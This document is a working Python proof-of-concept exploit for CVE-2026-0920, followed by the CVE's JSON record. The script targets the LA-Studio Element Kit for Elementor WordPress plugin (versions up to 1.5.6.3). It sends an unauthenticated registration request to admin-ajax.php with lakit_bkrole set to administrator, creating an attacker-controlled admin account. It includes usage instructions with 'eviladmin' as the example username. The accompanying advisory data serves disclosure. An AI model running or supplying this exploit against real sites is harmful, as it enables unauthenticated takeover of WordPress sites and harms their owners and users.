CVE-2026-0920

import requests import sys # CVE-2026-0920 PoC - LA-Studio Element Kit Admin Account Creation # Target: WordPress site with LA-Studio Element Kit plugin <= 1.5.6.3 def create_admin_account(target_url, username, email): """ Exploit for CVE-2026-0920 Creates an administrator account via the vulnerable ajax_register_handle function """ # Target endpoint (typical WordPress AJAX handler) endpoint = target_url.rstrip('/') + '/wp-admin/admin-ajax.php' # Payload with lakit_bkrole parameter set to administrator data = { 'action': 'ajax_register_handle', 'lakit_bkrole': 'administrator', # Key parameter for privilege escalation 'user_login': username, 'user_email': email, 'user_password': 'P@ssw0rd123!', 'user_password_re': 'P@ssw0rd123!' } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: print(f'[*] Sending exploit request to {endpoint}') print(f'[*] Attempting to create admin user: {username}') response = requests.post(endpoint, data=data, headers=headers, timeout=30) if response.status_code == 200: print('[+] Request sent successfully') print(f'[*] Response: {response.text[:500]}') if 'success' in response.text.lower() or 'register' in response.text.lower(): print('[+] Admin account creation may have succeeded!') print(f'[+] Login at: {target_url}/wp-admin/') return True print('[-] Exploit may have failed - check manually') return False except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python cve-2026-0920.py <target_url> <username> <email>') print('Example: python cve-2026-0920.py http://target.com eviladmin [email protected]') sys.exit(1) create_admin_account(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2026-0920", "sourceIdentifier": "[email protected]", "published": "2026-01-22T07:15:50.813", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator access to the site."}, {"lang": "es", "value": "El plugin LA-Studio Element Kit para Elementor para WordPress es vulnerable a la creación de usuarios administrativos en todas las versiones hasta e incluyendo la 1.5.6.3. Esto se debe a que la función 'ajax_register_handle' no restringe con qué roles de usuario puede registrarse un usuario. Esto hace posible que atacantes no autenticados suministren el parámetro 'lakit_bkrole' durante el registro y obtengan acceso de administrador al sitio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/lastudio-element-kit/tags/1.5.6.3/includes/integrations/override.php#L301", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3439121/lastudio-element-kit", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/65ebc744-6cc2-47ce-b225-81820e49d59c?source=cve", "source": "[email protected]"}]}}